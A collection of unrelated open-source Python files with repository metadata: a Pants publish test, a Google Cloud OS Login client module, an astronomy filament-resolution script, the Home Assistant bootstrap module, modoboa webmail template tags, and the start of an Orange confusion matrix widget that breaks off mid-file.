# This test needs a working ca bundle to work. Verified manually for now.
# pytest.param(
# ["--ca-certs-path={}"],
# "--cert=ca_certs.pem",
# id="[GLOBAL].ca_certs_path",
# ),
],
)
def test_twine_cert_arg(rule_runner, packages, options, cert_arg) -> None:
ca_cert_path = rule_runner.write_files({"conf/ca_certs.pem": ""})[0]
rule_runner.write_files(project_files(repositories=["@private"]))
set_options(rule_runner, [opt.format(ca_cert_path) for opt in options])
result = request_publish_processes(rule_runner, packages)
assert len(result) == 1
process = result[0].process
assert process
if cert_arg:
assert cert_arg in process.process.argv
else:
assert not any(arg.startswith("--cert") for arg in process.process.argv)
| {
"content_hash": "109cf833abae90cd6424fbd103e4f669",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 94,
"avg_line_length": 31.210526315789473,
"alnum_prop": 0.5905258316725434,
"repo_name": "pantsbuild/pants",
"id": "1f0ee49b478b72317828524a74747dae95386611",
"size": "6655",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "src/python/pants/backend/python/goals/publish_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "688"
},
{
"name": "Dockerfile",
"bytes": "1132"
},
{
"name": "Go",
"bytes": "67315"
},
{
"name": "Java",
"bytes": "97190"
},
{
"name": "Kotlin",
"bytes": "6433"
},
{
"name": "Mustache",
"bytes": "3771"
},
{
"name": "Python",
"bytes": "7582858"
},
{
"name": "Rust",
"bytes": "1657282"
},
{
"name": "Scala",
"bytes": "21950"
},
{
"name": "Shell",
"bytes": "31400"
},
{
"name": "Starlark",
"bytes": "76892"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from google.cloud.oslogin_v1 import types
from google.cloud.oslogin_v1.gapic import enums
from google.cloud.oslogin_v1.gapic import os_login_service_client
class OsLoginServiceClient(os_login_service_client.OsLoginServiceClient):
__doc__ = os_login_service_client.OsLoginServiceClient.__doc__
enums = enums
__all__ = ("enums", "types", "OsLoginServiceClient")
| {
"content_hash": "ebcfc00e88e06582a57ff3fbc2788b8d",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 73,
"avg_line_length": 31.692307692307693,
"alnum_prop": 0.7621359223300971,
"repo_name": "tseaver/google-cloud-python",
"id": "83a5ac2635377b56a180adf7be09600c5135a48b",
"size": "1015",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "oslogin/google/cloud/oslogin_v1/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "30519057"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
'''
Check resolution effects of masking process.
Degrade an image to match the resolution of a more distant one,
then compare the outputs.
'''
from fil_finder import fil_finder_2D
import numpy as np
from astropy.io.fits import getdata
from astropy import convolution
import matplotlib.pyplot as p
# We want to compare one of the closest regions (Pipe)
# to one of the most distant (Orion-A S).
pipe_img, pipe_hdr = getdata("pipeCenterB59-250.fits", header=True)
pipe_distance = 140. # pc
# orion_img, orion_hdr = getdata("orionA-S-250.fits", header=True)
orion_distance = 400. # pc
r = orion_distance / pipe_distance
conv = np.sqrt(r**2. - 1)
## What to do?
compute = False
output = True
downsample = False
if compute:
kernel = convolution.Gaussian2DKernel(conv)
pipe_degraded = convolution.convolve(pipe_img, kernel, boundary='fill',
fill_value=np.NaN)
p.subplot(121)
p.imshow(np.arctan(pipe_img/np.percentile(pipe_img[np.isfinite(pipe_img)], 95)),
origin="lower", interpolation="nearest")
p.subplot(122)
p.imshow(np.arctan(pipe_degraded/np.percentile(pipe_degraded[np.isfinite(pipe_degraded)], 95)),
origin="lower", interpolation="nearest")
p.show()
filfind = fil_finder_2D(pipe_degraded, pipe_hdr, 18.2, 30, 15, 30, distance=400, glob_thresh=20)
filfind.run(verbose=False, save_name="degraded_pipe", save_plots=False)
## Analysis
if output:
from astropy.table import Table
deg_pipe_analysis = Table.read("degraded_pipe_table.fits")
pipe_analysis = Table.read("pipeCenterB59-250/pipeCenterB59-250_table.fits")
# Plot lengths, widths, orientation, curvature. Adjust for distance difference
# p.subplot2grid((4,2), (0,0))
p.subplot(411)
num1 = int(np.sqrt(deg_pipe_analysis["FWHM"][np.isfinite(deg_pipe_analysis["FWHM"])].size))
num2 = int(np.sqrt(pipe_analysis["FWHM"][np.isfinite(pipe_analysis["FWHM"])].size))
p.hist(deg_pipe_analysis["FWHM"][np.isfinite(deg_pipe_analysis["FWHM"])] / conv,
bins=num1, label="Degraded", alpha=0.5, color='g')
p.hist(pipe_analysis["FWHM"][np.isfinite(pipe_analysis["FWHM"])],
bins=num2, label="Normal", alpha=0.5, color='b')
p.xlabel("Width (pc)")
p.legend()
# p.subplot2grid((4,2), (0,1))
p.subplot(412)
p.hist(deg_pipe_analysis["Lengths"] / conv, bins=num1, label="Degraded", alpha=0.5)
p.hist(pipe_analysis["Lengths"], bins=num2, label="Normal", alpha=0.5)
p.xlabel("Length (pc)")
# p.legend()
# p.subplot2grid((4,2), (1,0))
p.subplot(413)
p.hist(deg_pipe_analysis["Orientation"], bins=num1, label="Degraded", alpha=0.5)
p.hist(pipe_analysis["Orientation"], bins=num2, label="Normal", alpha=0.5)
p.xlabel("Orientation")
# p.legend()
# p.subplot2grid((4,2), (1,1))
p.subplot(414)
p.hist(deg_pipe_analysis["Curvature"], bins=num1, label="Degraded", alpha=0.5)
p.hist(pipe_analysis["Curvature"], bins=num2, label="Normal", alpha=0.5)
p.xlabel("Curvature")
# p.legend()
# p.savefig("pipe_comparison_hists.pdf")
# p.savefig("pipe_comparison_hists.eps")
p.show()
## Compare distributions using KS Test
from scipy.stats import ks_2samp
fwhm_ks = ks_2samp(deg_pipe_analysis["FWHM"][np.isfinite(deg_pipe_analysis["FWHM"])] / conv,
pipe_analysis["FWHM"][np.isfinite(pipe_analysis["FWHM"])])
l_ks = ks_2samp(deg_pipe_analysis["Lengths"] / conv,
pipe_analysis["Lengths"])
o_ks = ks_2samp(np.sin(deg_pipe_analysis["Orientation"]),
np.sin(pipe_analysis["Orientation"]))
c_ks = ks_2samp(deg_pipe_analysis["Curvature"],
pipe_analysis["Curvature"])
ks_tab = Table([fwhm_ks, l_ks, o_ks, c_ks],
names=["FWHM", "Length", "Orientation", "Curvature"])
# ks_tab.write("pipe_comparison_ks_results.csv")
# ks_tab.write("pipe_comparison_ks_results.tex")
## Compare skeletons
deg_pipe_skel = getdata("degraded_pipe_skeletons.fits", 0)
deg_pipe_skel[np.where(deg_pipe_skel>1)] = 1
deg_pipe_skel = deg_pipe_skel[510:1200, 1440:1920]
filfind = fil_finder_2D(pipe_img, pipe_hdr, 18.2, 30, 15, 30, distance=400, glob_thresh=20)
filfind.create_mask(border_masking=True)
filfind.medskel(verbose=False)
filfind.analyze_skeletons()
pipe_skel = filfind.skeleton[30:-30, 30:-30] #getdata("pipeCenterB59-250/pipeCenterB59-250_skeletons.fits", 0)
pipe_skel[np.where(pipe_skel>1)] = 1
pipe_skel = pipe_skel[510:1200, 1440:1920]
# p.subplot2grid((4,2), (2,0), colspan=2, rowspan=2)
pipe_img = pipe_img[510:1200, 1440:1920]
ax = p.imshow(np.arctan(pipe_img/np.percentile(pipe_img[np.isfinite(pipe_img)], 95)),
origin="lower", interpolation="nearest", cmap="binary")
ax.axes.get_xaxis().set_ticks([])
ax.axes.get_yaxis().set_ticks([])
cont1 = p.contour(pipe_skel, colors="b", linewidths=3, label="Normal")
cont1.collections[0].set_label("Normal")
cont2 = p.contour(deg_pipe_skel, colors="g", alpha=0.5, label="Degraded")
cont2.collections[0].set_label("Degraded")
p.legend(loc="upper right")
p.show()
if downsample:
def downsample_axis(myarr, factor, axis, estimator=np.nanmean, truncate=False):
"""
Downsample an ND array by averaging over *factor* pixels along an axis.
Crops right side if the shape is not a multiple of factor.
This code is pure np and should be fast.
Parameters
----------
myarr : `~numpy.ndarray`
The array to downsample
factor : int
The factor to downsample by
axis : int
The axis to downsample along
estimator : function
defaults to mean. You can downsample by summing or
something else if you want a different estimator
(e.g., downsampling error: you want to sum & divide by sqrt(n))
truncate : bool
Whether to truncate the last chunk or average over a smaller number.
e.g., if you downsample [1,2,3,4] by a factor of 3, you could get either
[2] or [2,4] if truncate is True or False, respectively.
"""
# size of the dimension of interest
xs = myarr.shape[axis]
if xs % int(factor) != 0:
if truncate:
view = [slice(None) for ii in range(myarr.ndim)]
view[axis] = slice(None,xs-(xs % int(factor)))
crarr = myarr[view]
else:
newshape = list(myarr.shape)
newshape[axis] = (factor - xs % int(factor))
extension = np.empty(newshape) * np.nan
crarr = np.concatenate((myarr,extension), axis=axis)
else:
crarr = myarr
def makeslice(startpoint,axis=axis,step=factor):
# make empty slices
view = [slice(None) for ii in range(myarr.ndim)]
# then fill the appropriate slice
view[axis] = slice(startpoint,None,step)
return view
# The extra braces here are crucial: We're adding an extra dimension so we
# can average across it!
stacked_array = np.concatenate([[crarr[makeslice(ii)]] for ii in range(factor)])
dsarr = estimator(stacked_array, axis=0)
return dsarr
downsample = downsample_axis(pipe_img, 3, axis=0)
downsample = downsample_axis(downsample, 3, axis=1)
print downsample.shape
p.subplot(1,2,1)
p.title("Pipe Normal")
p.imshow(np.arctan(pipe_img/np.percentile(pipe_img[np.isfinite(pipe_img)], 95)),
origin="lower", interpolation="nearest")
p.subplot(1,2,2)
p.title("Downsample")
p.imshow(np.arctan(downsample/np.percentile(downsample[np.isfinite(downsample)], 95)),
origin="lower", interpolation="nearest")
p.show() | {
"content_hash": "4f467fb64b233b7f8812a878326503be",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 115,
"avg_line_length": 36.88837209302326,
"alnum_prop": 0.626780986004287,
"repo_name": "dcolombo/FilFinder",
"id": "421fc5d84cda562fd26c0d319de90c7ac370eed7",
"size": "7990",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "examples/paper_figures/match_resolution.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "244375"
}
],
"symlink_target": ""
} |
"""Provide methods to bootstrap a Home Assistant instance."""
import asyncio
import logging
import logging.handlers
import os
import sys
from time import time
from collections import OrderedDict
from typing import Any, Optional, Dict
import voluptuous as vol
import homeassistant.components as core_components
from homeassistant.components import persistent_notification
import homeassistant.config as conf_util
import homeassistant.core as core
from homeassistant.const import EVENT_HOMEASSISTANT_CLOSE
from homeassistant.setup import async_setup_component
import homeassistant.loader as loader
from homeassistant.util.logging import AsyncHandler
from homeassistant.util.package import async_get_user_site, get_user_site
from homeassistant.util.yaml import clear_secret_cache
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers.signal import async_register_signal_handling
_LOGGER = logging.getLogger(__name__)
ERROR_LOG_FILENAME = 'home-assistant.log'
FIRST_INIT_COMPONENT = set((
'recorder', 'mqtt', 'mqtt_eventstream', 'logger', 'introduction',
'frontend', 'history'))
def from_config_dict(config: Dict[str, Any],
hass: Optional[core.HomeAssistant]=None,
config_dir: Optional[str]=None,
enable_log: bool=True,
verbose: bool=False,
skip_pip: bool=False,
log_rotate_days: Any=None) \
-> Optional[core.HomeAssistant]:
"""Try to configure Home Assistant from a configuration dictionary.
Dynamically loads required components and its dependencies.
"""
if hass is None:
hass = core.HomeAssistant()
if config_dir is not None:
config_dir = os.path.abspath(config_dir)
hass.config.config_dir = config_dir
hass.loop.run_until_complete(
async_mount_local_lib_path(config_dir, hass.loop))
# run task
hass = hass.loop.run_until_complete(
async_from_config_dict(
config, hass, config_dir, enable_log, verbose, skip_pip,
log_rotate_days)
)
return hass
@asyncio.coroutine
def async_from_config_dict(config: Dict[str, Any],
hass: core.HomeAssistant,
config_dir: Optional[str]=None,
enable_log: bool=True,
verbose: bool=False,
skip_pip: bool=False,
log_rotate_days: Any=None) \
-> Optional[core.HomeAssistant]:
"""Try to configure Home Assistant from a configuration dictionary.
Dynamically loads required components and its dependencies.
This method is a coroutine.
"""
start = time()
core_config = config.get(core.DOMAIN, {})
try:
yield from conf_util.async_process_ha_core_config(hass, core_config)
except vol.Invalid as ex:
conf_util.async_log_exception(ex, 'homeassistant', core_config, hass)
return None
yield from hass.async_add_job(conf_util.process_ha_config_upgrade, hass)
if enable_log:
async_enable_logging(hass, verbose, log_rotate_days)
hass.config.skip_pip = skip_pip
if skip_pip:
_LOGGER.warning("Skipping pip installation of required modules. "
"This may cause issues")
if not loader.PREPARED:
yield from hass.async_add_job(loader.prepare, hass)
# Merge packages
conf_util.merge_packages_config(
config, core_config.get(conf_util.CONF_PACKAGES, {}))
# Make a copy because we are mutating it.
# Use OrderedDict in case original one was one.
# Convert values to dictionaries if they are None
new_config = OrderedDict()
for key, value in config.items():
new_config[key] = value or {}
config = new_config
# Filter out the repeating and common config section [homeassistant]
components = set(key.split(' ')[0] for key in config.keys()
if key != core.DOMAIN)
# setup components
# pylint: disable=not-an-iterable
res = yield from core_components.async_setup(hass, config)
if not res:
_LOGGER.error("Home Assistant core failed to initialize. "
"further initialization aborted")
return hass
yield from persistent_notification.async_setup(hass, config)
_LOGGER.info("Home Assistant core initialized")
# stage 1
for component in components:
if component not in FIRST_INIT_COMPONENT:
continue
hass.async_add_job(async_setup_component(hass, component, config))
yield from hass.async_block_till_done()
# stage 2
for component in components:
if component in FIRST_INIT_COMPONENT:
continue
hass.async_add_job(async_setup_component(hass, component, config))
yield from hass.async_block_till_done()
stop = time()
_LOGGER.info("Home Assistant initialized in %.2fs", stop-start)
async_register_signal_handling(hass)
return hass
def from_config_file(config_path: str,
hass: Optional[core.HomeAssistant]=None,
verbose: bool=False,
skip_pip: bool=True,
log_rotate_days: Any=None):
"""Read the configuration file and try to start all the functionality.
Will add functionality to 'hass' parameter if given,
instantiates a new Home Assistant object if 'hass' is not given.
"""
if hass is None:
hass = core.HomeAssistant()
# run task
hass = hass.loop.run_until_complete(
async_from_config_file(
config_path, hass, verbose, skip_pip, log_rotate_days)
)
return hass
@asyncio.coroutine
def async_from_config_file(config_path: str,
hass: core.HomeAssistant,
verbose: bool=False,
skip_pip: bool=True,
log_rotate_days: Any=None):
"""Read the configuration file and try to start all the functionality.
Will add functionality to 'hass' parameter.
This method is a coroutine.
"""
# Set config dir to directory holding config file
config_dir = os.path.abspath(os.path.dirname(config_path))
hass.config.config_dir = config_dir
yield from async_mount_local_lib_path(config_dir, hass.loop)
async_enable_logging(hass, verbose, log_rotate_days)
try:
config_dict = yield from hass.async_add_job(
conf_util.load_yaml_config_file, config_path)
except HomeAssistantError as err:
_LOGGER.error("Error loading %s: %s", config_path, err)
return None
finally:
clear_secret_cache()
hass = yield from async_from_config_dict(
config_dict, hass, enable_log=False, skip_pip=skip_pip)
return hass
@core.callback
def async_enable_logging(hass: core.HomeAssistant, verbose: bool=False,
log_rotate_days=None) -> None:
"""Set up the logging.
This method must be run in the event loop.
"""
logging.basicConfig(level=logging.INFO)
fmt = ("%(asctime)s %(levelname)s (%(threadName)s) "
"[%(name)s] %(message)s")
colorfmt = "%(log_color)s{}%(reset)s".format(fmt)
datefmt = '%Y-%m-%d %H:%M:%S'
# Suppress overly verbose logs from libraries that aren't helpful
logging.getLogger('requests').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
logging.getLogger('aiohttp.access').setLevel(logging.WARNING)
try:
from colorlog import ColoredFormatter
logging.getLogger().handlers[0].setFormatter(ColoredFormatter(
colorfmt,
datefmt=datefmt,
reset=True,
log_colors={
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'red',
}
))
except ImportError:
pass
# Log errors to a file if we have write access to file or config dir
err_log_path = hass.config.path(ERROR_LOG_FILENAME)
err_path_exists = os.path.isfile(err_log_path)
# Check if we can write to the error log if it exists or that
# we can create files in the containing directory if not.
if (err_path_exists and os.access(err_log_path, os.W_OK)) or \
(not err_path_exists and os.access(hass.config.config_dir, os.W_OK)):
if log_rotate_days:
err_handler = logging.handlers.TimedRotatingFileHandler(
err_log_path, when='midnight', backupCount=log_rotate_days)
else:
err_handler = logging.FileHandler(
err_log_path, mode='w', delay=True)
err_handler.setLevel(logging.INFO if verbose else logging.WARNING)
err_handler.setFormatter(logging.Formatter(fmt, datefmt=datefmt))
async_handler = AsyncHandler(hass.loop, err_handler)
@asyncio.coroutine
def async_stop_async_handler(event):
"""Cleanup async handler."""
logging.getLogger('').removeHandler(async_handler)
yield from async_handler.async_close(blocking=True)
hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_CLOSE, async_stop_async_handler)
logger = logging.getLogger('')
logger.addHandler(async_handler)
logger.setLevel(logging.INFO)
else:
_LOGGER.error(
"Unable to setup error log %s (access denied)", err_log_path)
def mount_local_lib_path(config_dir: str) -> str:
"""Add local library to Python Path."""
deps_dir = os.path.join(config_dir, 'deps')
lib_dir = get_user_site(deps_dir)
if lib_dir not in sys.path:
sys.path.insert(0, lib_dir)
return deps_dir
@asyncio.coroutine
def async_mount_local_lib_path(config_dir: str,
loop: asyncio.AbstractEventLoop) -> str:
"""Add local library to Python Path.
This function is a coroutine.
"""
deps_dir = os.path.join(config_dir, 'deps')
lib_dir = yield from async_get_user_site(deps_dir, loop=loop)
if lib_dir not in sys.path:
sys.path.insert(0, lib_dir)
return deps_dir
| {
"content_hash": "01ad0a8eb5220c71d30c8f2984622b53",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 77,
"avg_line_length": 34.346666666666664,
"alnum_prop": 0.6304347826086957,
"repo_name": "MungoRae/home-assistant",
"id": "7831036ff597e6f68403e718deffe2f7256ed582",
"size": "10304",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/bootstrap.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13788"
},
{
"name": "HTML",
"bytes": "1686638"
},
{
"name": "JavaScript",
"bytes": "15192"
},
{
"name": "Python",
"bytes": "7266062"
},
{
"name": "Ruby",
"bytes": "517"
},
{
"name": "Shell",
"bytes": "15114"
}
],
"symlink_target": ""
} |
"""Custom template tags."""
from six.moves.urllib.parse import urlencode
from django import template
from django.urls import reverse
from django.template.loader import render_to_string
from django.utils.encoding import smart_str
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from ..lib import imapheader, separate_mailbox
from .. import constants
register = template.Library()
@register.simple_tag
def viewmail_menu(selection, folder, user, mail_id=None):
"""Menu of the viewmail location."""
entries = [{
"name": "back",
"url": "javascript:history.go(-1)",
"img": "fa fa-arrow-left",
"class": "btn-default",
"label": _("Back")
}, {
"name": "reply",
"url": "action=reply&mbox=%s&mailid=%s" % (folder, mail_id),
"img": "fa fa-mail-reply",
"class": "btn-primary",
"label": _("Reply"),
"menu": [{
"name": "replyall",
"url": "action=reply&mbox=%s&mailid=%s&all=1" % (folder, mail_id),
"img": "fa fa-mail-reply-all",
"label": _("Reply all")
}, {
"name": "forward",
"url": "action=forward&mbox=%s&mailid=%s" % (folder, mail_id),
"img": "fa fa-mail-forward",
"label": _("Forward")
}]
}, {
"name": "delete",
"img": "fa fa-trash",
"class": "btn-danger",
"url": u"{0}?mbox={1}&selection[]={2}".format(
reverse("modoboa_webmail:mail_delete"), folder, mail_id),
"title": _("Delete")
}, {
"name": "mark_as_junk",
"img": "fa fa-fire",
"class": "btn-warning",
"url": u"{0}?mbox={1}&selection[]={2}".format(
reverse("modoboa_webmail:mail_mark_as_junk"), folder, mail_id),
"title": _("Mark as spam")
}, {
"name": "display_options",
"title": _("Display options"),
"img": "fa fa-cog",
"menu": [{
"name": "activate_links",
"label": _("Activate links")
}, {
"name": "disable_links",
"label": _("Disable links")
}, {
"name": "show_source",
"label": _("Show source"),
"url": u"{}?mbox={}&mailid={}".format(
reverse("modoboa_webmail:mailsource_get"), folder, mail_id)
}]
}]
if folder == user.parameters.get_value("junk_folder"):
entries[3] = {
"name": "mark_as_not_junk",
"img": "fa fa-thumbs-up",
"class": "btn-success",
"url": u"{0}?mbox={1}&selection[]={2}".format(
reverse("modoboa_webmail:mail_mark_as_not_junk"),
folder, mail_id),
"title": _("Mark as not spam")
}
menu = render_to_string('common/buttons_list.html',
{"selection": selection, "entries": entries,
"user": user, "extraclasses": "pull-left"})
return menu
@register.simple_tag
def compose_menu(selection, backurl, user, **kwargs):
"""The menu of the compose action."""
entries = [
{"name": "back",
"url": "javascript:history.go(-2);",
"img": "fa fa-arrow-left",
"class": "btn-default",
"label": _("Back")},
{"name": "sendmail",
"url": "",
"img": "fa fa-send",
"class": "btn-default btn-primary",
"label": _("Send")},
]
context = {
"selection": selection, "entries": entries, "user": user
}
context.update(kwargs)
return render_to_string('modoboa_webmail/compose_menubar.html', context)
@register.simple_tag
def listmailbox_menu(selection, folder, user, **kwargs):
"""The menu of the listmailbox action."""
entries = [{
"name": "totrash",
"title": _("Delete"),
"class": "btn-danger",
"img": "fa fa-trash",
"url": reverse("modoboa_webmail:mail_delete")
}, {
"name": "mark_as_junk_multi",
"img": "fa fa-fire",
"class": "btn-warning",
"url": reverse("modoboa_webmail:mail_mark_as_junk"),
"title": _("Mark as spam")
}, {
"name": "actions",
"label": _("Actions"),
"class": "btn btn-default",
"menu": [{
"name": "mark-read",
"label": _("Mark as read"),
"url": u"{0}?status=read".format(
reverse("modoboa_webmail:mail_mark", args=[folder]))
}, {
"name": "mark-unread",
"label": _("Mark as unread"),
"url": u"{0}?status=unread".format(
reverse("modoboa_webmail:mail_mark", args=[folder]))
}, {
"name": "mark-flagged",
"label": _("Mark as flagged"),
"url": u"{0}?status=flagged".format(
reverse("modoboa_webmail:mail_mark", args=[folder]))
}, {
"name": "mark-unflagged",
"label": _("Mark as unflagged"),
"url": u"{0}?status=unflagged".format(
reverse("modoboa_webmail:mail_mark", args=[folder]))
}]
}]
sort_actions = [{
"header": True,
"label": _("Sort by")
}]
current_order = kwargs.get("sort_order")
for order in constants.SORT_ORDERS:
entry = {
"name": "sort_by_{}".format(order[0]),
"label": order[1],
"url": order[0],
"class": "sort-order"
}
if current_order[1:] == order[0]:
css = "fa fa-arrow-{}".format(
"down" if current_order[0] == "-" else "up")
entry.update({"img": css})
sort_actions.append(entry)
entries[2]["menu"] += sort_actions
if folder == user.parameters.get_value("trash_folder"):
entries[0]["class"] += " disabled"
entries[2]["menu"].insert(4, {
"name": "empty",
"label": _("Empty folder"),
"url": u"{0}?name={1}".format(
reverse("modoboa_webmail:trash_empty"), folder)
})
elif folder == user.parameters.get_value("junk_folder"):
entries[1] = {
"name": "mark_as_not_junk_multi",
"img": "fa fa-thumbs-up",
"class": "btn-success",
"url": reverse("modoboa_webmail:mail_mark_as_not_junk"),
"title": _("Mark as not spam")
}
return render_to_string('modoboa_webmail/main_action_bar.html', {
'selection': selection, 'entries': entries, 'user': user, 'css': "nav",
})
@register.simple_tag
def print_mailboxes(
tree, selected=None, withunseen=False, selectonly=False,
hdelimiter='.'):
"""Display a tree of mailboxes and sub-mailboxes.
:param tree: the mailboxes to display
"""
result = ""
for mbox in tree:
cssclass = ""
name = mbox["path"] if "sub" in mbox else mbox["name"]
label = (
mbox["label"] if "label" in mbox else
separate_mailbox(mbox["name"], hdelimiter)[0])
if mbox.get("removed", False):
cssclass = "disabled"
elif selected == name:
cssclass = "active"
result += "<li name='%s' class='droppable %s'>\n" % (name, cssclass)
cssclass = ""
extra_attrs = ""
if withunseen and "unseen" in mbox:
label += " (%d)" % mbox["unseen"]
cssclass += " unseen"
extra_attrs = ' data-toggle="%d"' % mbox["unseen"]
if "sub" in mbox:
if selected is not None and selected != name and selected.count(
name):
ul_state = "visible"
div_state = "expanded"
else:
ul_state = "hidden"
div_state = "collapsed"
result += "<div class='clickbox %s'></div>" % div_state
result += "<a href='%s' class='%s' name='%s'%s>" % (
"path" in mbox and mbox["path"] or mbox["name"], cssclass,
'selectfolder' if selectonly else 'loadfolder', extra_attrs
)
iclass = mbox["class"] if "class" in mbox \
else "fa fa-folder"
result += "<span class='%s'></span> %s</a>" % (iclass, label)
if "sub" in mbox and mbox["sub"]:
result += "<ul name='%s' class='nav nav-pills nav-stacked %s'>" % (
mbox["path"], ul_state) + print_mailboxes(
mbox["sub"], selected, withunseen, selectonly, hdelimiter
) + "</ul>\n"
result += "</li>\n"
return mark_safe(result)
@register.simple_tag
def mboxes_menu():
"""Mailboxes menu."""
entries = [
{"name": "newmbox",
"url": reverse("modoboa_webmail:folder_add"),
"img": "fa fa-plus",
"label": _("Create a new folder"),
"modal": True,
"modalcb": "webmail.mboxform_cb",
"closecb": "webmail.mboxform_close",
"class": "btn-default btn-xs"},
{"name": "editmbox",
"url": reverse("modoboa_webmail:folder_change"),
"img": "fa fa-edit",
"label": _("Edit the selected folder"),
"class": "btn-default btn-xs"},
{"name": "removembox",
"url": reverse("modoboa_webmail:folder_delete"),
"img": "fa fa-trash",
"label": _("Remove the selected folder"),
"class": "btn-default btn-xs"},
{"name": "compress",
"img": "fa fa-compress",
"label": _("Compress folder"),
"class": "btn-default btn-xs",
"url": reverse("modoboa_webmail:folder_compress")}
]
context = {
"entries": entries,
"css": "dropdown-menu",
}
return render_to_string('common/menu.html', context)
@register.filter
def parse_imap_header(value, header):
"""Simple template tag to display a IMAP header."""
safe = True
try:
value = getattr(imapheader, "parse_%s" % header)(value)
except AttributeError:
pass
if header == "from":
value = value[0]
elif header == "subject":
safe = False
return value if not safe else mark_safe(value)
@register.simple_tag
def attachment_url(mbox, mail_id, fname, key):
"""Return full download url of an attachment."""
url = reverse("modoboa_webmail:attachment_get")
params = {
"mbox": mbox,
"mailid": mail_id,
"fname": smart_str(fname),
"partnumber": key
}
url = "{}?{}".format(url, urlencode(params))
return url
| {
"content_hash": "2b77083b68d4cb1123a58378cec2eaaf",
"timestamp": "",
"source": "github",
"line_count": 311,
"max_line_length": 79,
"avg_line_length": 33.81028938906753,
"alnum_prop": 0.5078459343794579,
"repo_name": "modoboa/modoboa-webmail",
"id": "ad897862457f584da504c6081dfbb07432526944",
"size": "10531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modoboa_webmail/templatetags/webmail_tags.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4861"
},
{
"name": "HTML",
"bytes": "9888"
},
{
"name": "JavaScript",
"bytes": "48325"
},
{
"name": "Python",
"bytes": "164115"
}
],
"symlink_target": ""
} |
"""Confusion matrix widget"""
from math import isnan, isinf
import unicodedata
from PyQt4.QtGui import (
QGridLayout, QTableView, QStandardItemModel, QStandardItem,
QItemSelectionModel, QItemSelection, QFont, QHeaderView, QBrush, QColor,
QStyledItemDelegate)
from PyQt4.QtCore import Qt, QSize
import numpy
import sklearn.metrics as skl_metrics
import Orange
from Orange.widgets import widget, settings, gui
def confusion_matrix(res, index):
"""
Compute confusion matrix
Args:
res (Orange.evaluation.Results): evaluation results
index (int): model index
Returns: Confusion matrix
"""
return skl_metrics.confusion_matrix(
res.actual, res.predicted[index])
BorderRole = next(gui.OrangeUserRole)
BorderColorRole = next(gui.OrangeUserRole)
class BorderedItemDelegate(QStyledItemDelegate):
"""Item delegate that paints border at the specified sides
Data for `BorderRole` is a string containing letters t, r, b and/or l,
which defines the sides at which the border is drawn.
Role `BorderColorRole` sets the color for the cell. If not color is given,
`self.color` is used as default.
Args:
color (QColor): default color (default default is black)
"""
def __init__(self, color=Qt.black):
super().__init__()
self.color = color
def paint(self, painter, option, index):
"""Overloads `paint` to draw borders"""
QStyledItemDelegate.paint(self, painter, option, index)
borders = index.data(BorderRole)
if borders:
color = index.data(BorderColorRole) or self.color
painter.save()
painter.setPen(color)
rect = option.rect
for side, p1, p2 in (("t", rect.topLeft(), rect.topRight()),
("r", rect.topRight(), rect.bottomRight()),
("b", rect.bottomLeft(), rect.bottomRight()),
("l", rect.topLeft(), rect.bottomLeft())):
if side in borders:
painter.drawLine(p1, p2)
painter.restore()
class OWConfusionMatrix(widget.OWWidget):
"""Confusion matrix widget"""
name = "Confusion Matrix"
description = "Display a confusion matrix constructed from " \
"the results of classifier evaluations."
icon = "icons/ConfusionMatrix.svg"
priority = 1001
inputs = [("Evaluation Results", Orange.evaluation.Results, "set_results")]
outputs = [("Selected Data", Orange.data.Table)]
quantities = ["Number of instances",
"Proportion of predicted",
"Proportion of actual"]
settingsHandler = settings.ClassValuesContextHandler()
selected_learner = settings.Setting(0)
selection = settings.ContextSetting(set())
selected_quantity = settings.Setting(0)
append_predictions = settings.Setting(True)
append_probabilities = settings.Setting(False)
autocommit = settings.Setting(True)
UserAdviceMessages = [
widget.Message(
"Clicking on cells or in headers outputs the corresponding "
"data instances",
"click_cell")]
def __init__(self):
super().__init__()
if isinstance(self.selected_learner, list):
self.selected_learner = (self.selected_learner + [0])[0]
self.data = None
self.results = None
self.learners = []
self.headers = []
box = gui.vBox(self.controlArea, "Learners")
self.learners_box = gui.listBox(
box, self, "selected_learner", "learners",
callback=self._learner_changed
)
box = gui.vBox(self.controlArea, "Show")
gui.comboBox(box, self, "selected_quantity", items=self.quantities,
callback=self._update)
box = gui.vBox(self.controlArea, "Select")
gui.button(box, self, "Select Correct",
callback=self.select_correct, autoDefault=False)
gui.button(box, self, "Select Misclassified",
callback=self.select_wrong, autoDefault=False)
gui.button(box, self, "Clear Selection",
callback=self.select_none, autoDefault=False)
self.outputbox = box = gui.vBox(self.controlArea, "Output")
gui.checkBox(box, self, "append_predictions",
"Predictions", callback=self._invalidate)
gui.checkBox(box, self, "append_probabilities",
"Probabilities",
callback=self._invalidate)
gui.auto_commit(self.controlArea, self, "autocommit",
"Send Selected", "Send Automatically")
grid = QGridLayout()
self.tablemodel = QStandardItemModel(self)
view = self.tableview = QTableView(
editTriggers=QTableView.NoEditTriggers)
view.setModel(self.tablemodel)
view.horizontalHeader().hide()
